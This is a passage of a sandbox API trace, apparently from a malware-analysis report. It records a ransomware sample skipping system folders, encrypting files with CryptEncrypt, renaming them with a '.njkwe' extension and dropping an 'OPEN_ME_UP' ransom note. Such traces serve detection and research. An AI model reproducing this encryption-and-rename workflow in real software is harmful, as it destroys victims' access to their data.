lpNumberOfBytesRead=0x380f7e4*=0x2796, lpOverlapped=0x0) returned 1 [0062.233] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd86a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.233] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2796, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2796, lpOverlapped=0x0) returned 1 [0062.233] GetProcessHeap () returned 0xbe0000 [0062.233] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0062.233] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.233] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0062.233] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0062.234] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0062.234] CloseHandle (hObject=0x42c) returned 1 [0062.234] GetProcessHeap () returned 0xbe0000 [0062.234] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0062.234] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\stop.ico_r00t_{3sXlE5}.njkwe") returned 63 [0062.234] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\stop.ico_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico_r00t_{3sxle5}.njkwe")) returned 1 [0062.235] GetProcessHeap () returned 0xbe0000 [0062.235] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0062.235] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SysReqMet.ico", cAlternateFileName="SYSREQ~1.ICO")) returned 1 [0062.235] lstrcmpiW (lpString1="SysReqMet.ico", lpString2="Windows") returned -1 [0062.235] lstrcmpiW (lpString1="SysReqMet.ico", lpString2="$Recycle.bin") returned 1 [0062.235] lstrcmpiW (lpString1="SysReqMet.ico", lpString2="System Volume Information") returned -1 [0062.235] lstrcmpiW (lpString1="SysReqMet.ico", lpString2="Program Files") returned 1 [0062.235] lstrcmpiW (lpString1="SysReqMet.ico", lpString2="Program Files (x86)") returned 1 [0062.235] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 48 [0062.235] StrStrIW (lpFirst="SysReqMet.ico", lpSrch=".njkwe") returned 0x0 [0062.235] lstrcmpW (lpString1="SysReqMet.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.235] lstrcmpW (lpString1="SysReqMet.ico", lpString2="taridd") returned -1 [0062.235] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0062.235] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0062.235] GetTickCount () returned 0x114ffae [0062.235] GetTickCount () returned 0x114ffae [0062.235] GetTickCount () returned 0x114ffae [0062.235] GetTickCount () returned 0x114ffae [0062.236] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0062.236] GetProcessHeap () returned 0xbe0000 [0062.236] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0062.236] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x47e, lpOverlapped=0x0) returned 1 [0062.237] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffffb82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.237] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x47e, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x47e, lpOverlapped=0x0) returned 1 [0062.237] GetProcessHeap () returned 0xbe0000 [0062.237] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0062.237] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.238] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0062.238] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0062.238] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0062.238] CloseHandle (hObject=0x42c) returned 1 [0062.238] GetProcessHeap () returned 0xbe0000 [0062.238] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0062.238] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico_r00t_{3sXlE5}.njkwe") returned 68 [0062.239] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico_r00t_{3sxle5}.njkwe")) returned 1 [0062.239] GetProcessHeap () returned 0xbe0000 [0062.239] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0062.239] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SysReqNotMet.ico", cAlternateFileName="SYSREQ~2.ICO")) returned 1 [0062.239] lstrcmpiW (lpString1="SysReqNotMet.ico", lpString2="Windows") returned -1 [0062.239] lstrcmpiW (lpString1="SysReqNotMet.ico", lpString2="$Recycle.bin") returned 1 [0062.239] lstrcmpiW (lpString1="SysReqNotMet.ico", lpString2="System Volume Information") returned -1 [0062.239] lstrcmpiW (lpString1="SysReqNotMet.ico", lpString2="Program Files") returned 1 [0062.239] lstrcmpiW (lpString1="SysReqNotMet.ico", lpString2="Program Files (x86)") returned 1 [0062.239] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 51 [0062.239] StrStrIW (lpFirst="SysReqNotMet.ico", lpSrch=".njkwe") returned 0x0 [0062.239] lstrcmpW (lpString1="SysReqNotMet.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.239] lstrcmpW (lpString1="SysReqNotMet.ico", lpString2="taridd") returned -1 [0062.239] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0062.239] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0062.240] GetTickCount () returned 0x114ffbe [0062.240] GetTickCount () returned 0x114ffbe [0062.240] GetTickCount () returned 0x114ffbe [0062.240] GetTickCount () returned 0x114ffbe [0062.240] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0062.240] GetProcessHeap () returned 0xbe0000 [0062.240] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0062.240] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x47e, lpOverlapped=0x0) returned 1 [0062.241] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffffb82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.241] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x47e, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x47e, lpOverlapped=0x0) returned 1 [0062.241] GetProcessHeap () returned 0xbe0000 [0062.241] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0062.241] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.241] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0062.242] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0062.242] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0062.242] CloseHandle (hObject=0x42c) returned 1 [0062.242] GetProcessHeap () returned 0xbe0000 [0062.242] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0062.242] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico_r00t_{3sXlE5}.njkwe") returned 71 [0062.243] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico_r00t_{3sxle5}.njkwe")) returned 1 [0062.243] GetProcessHeap () returned 0xbe0000 [0062.243] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0062.243] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="warn.ico", cAlternateFileName="")) returned 1 [0062.243] lstrcmpiW (lpString1="warn.ico", lpString2="Windows") returned -1 [0062.243] lstrcmpiW (lpString1="warn.ico", lpString2="$Recycle.bin") returned 1 [0062.243] lstrcmpiW (lpString1="warn.ico", lpString2="System Volume Information") returned 1 [0062.243] lstrcmpiW (lpString1="warn.ico", lpString2="Program Files") returned 1 [0062.243] lstrcmpiW (lpString1="warn.ico", lpString2="Program Files (x86)") returned 1 [0062.243] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 43 [0062.243] StrStrIW (lpFirst="warn.ico", lpSrch=".njkwe") returned 0x0 [0062.243] lstrcmpW (lpString1="warn.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.243] lstrcmpW (lpString1="warn.ico", lpString2="taridd") returned 1 [0062.243] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\warn.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0062.243] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0062.243] GetTickCount () returned 0x114ffbe [0062.244] GetTickCount () returned 0x114ffbe [0062.244] GetTickCount () returned 0x114ffbe [0062.244] GetTickCount () returned 0x114ffbe [0062.244] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0062.244] GetProcessHeap () returned 0xbe0000 [0062.244] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0062.244] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2796, lpOverlapped=0x0) returned 1 [0062.245] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd86a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.245] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2796, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2796, lpOverlapped=0x0) returned 1 [0062.245] GetProcessHeap () returned 0xbe0000 [0062.245] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0062.245] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.245] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0062.246] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0062.246] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0062.246] CloseHandle (hObject=0x42c) returned 1 [0062.246] GetProcessHeap () returned 0xbe0000 [0062.246] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0062.246] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\warn.ico_r00t_{3sXlE5}.njkwe") returned 63 [0062.246] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\warn.ico_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico_r00t_{3sxle5}.njkwe")) returned 1 [0062.247] GetProcessHeap () returned 0xbe0000 [0062.247] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0062.247] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="warn.ico", cAlternateFileName="")) returned 0 [0062.247] FindClose (in: hFindFile=0xc1a120 | out: hFindFile=0xc1a120) returned 1 [0062.247] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 66 [0062.247] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\graphics\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0062.248] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0062.249] CloseHandle (hObject=0x428) returned 1 [0062.249] GetProcessHeap () returned 0xbe0000 [0062.249] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0062.249] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0xe2c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="header.bmp", cAlternateFileName="")) returned 1 [0062.249] lstrcmpiW (lpString1="header.bmp", lpString2="Windows") returned -1 [0062.249] lstrcmpiW (lpString1="header.bmp", lpString2="$Recycle.bin") returned 1 [0062.249] lstrcmpiW (lpString1="header.bmp", lpString2="System Volume Information") returned -1 [0062.249] lstrcmpiW (lpString1="header.bmp", lpString2="Program Files") returned -1 [0062.249] lstrcmpiW (lpString1="header.bmp", lpString2="Program Files (x86)") returned -1 [0062.249] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\header.bmp") returned 36 [0062.249] StrStrIW (lpFirst="header.bmp", lpSrch=".njkwe") returned 0x0 [0062.249] lstrcmpW (lpString1="header.bmp", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.250] lstrcmpW (lpString1="header.bmp", lpString2="taridd") returned -1 [0062.250] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\header.bmp", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0062.250] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0062.298] GetTickCount () returned 0x114ffed [0062.298] GetTickCount () returned 0x114ffed [0062.298] GetTickCount () returned 0x114ffed [0062.298] GetTickCount () returned 0x114ffed [0062.298] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0062.298] GetProcessHeap () returned 0xbe0000 [0062.298] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0062.298] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0xe2c, lpOverlapped=0x0) returned 1 [0062.300] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfffff1d4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.300] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0xe2c, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0xe2c, lpOverlapped=0x0) returned 1 [0062.300] GetProcessHeap () returned 0xbe0000 [0062.300] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0062.300] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.300] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0062.301] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0062.301] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0062.301] CloseHandle (hObject=0x428) returned 1 [0062.303] GetProcessHeap () returned 0xbe0000 [0062.303] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0062.303] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\header.bmp_r00t_{3sXlE5}.njkwe") returned 56 [0062.303] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\header.bmp_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\header.bmp_r00t_{3sxle5}.njkwe")) returned 1 [0062.304] GetProcessHeap () returned 0xbe0000 [0062.304] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0062.304] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x66ea7e00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0x66ea7e00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x66ea7e00, ftLastWriteTime.dwHighDateTime=0x1cac6e3, nFileSizeHigh=0x0, nFileSizeLow=0xad1384b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="netfx_Core.mzz", cAlternateFileName="NETFX_~1.MZZ")) returned 1 [0062.305] lstrcmpiW (lpString1="netfx_Core.mzz", lpString2="Windows") returned -1 [0062.305] lstrcmpiW (lpString1="netfx_Core.mzz", lpString2="$Recycle.bin") returned 1 [0062.305] lstrcmpiW (lpString1="netfx_Core.mzz", lpString2="System Volume Information") returned -1 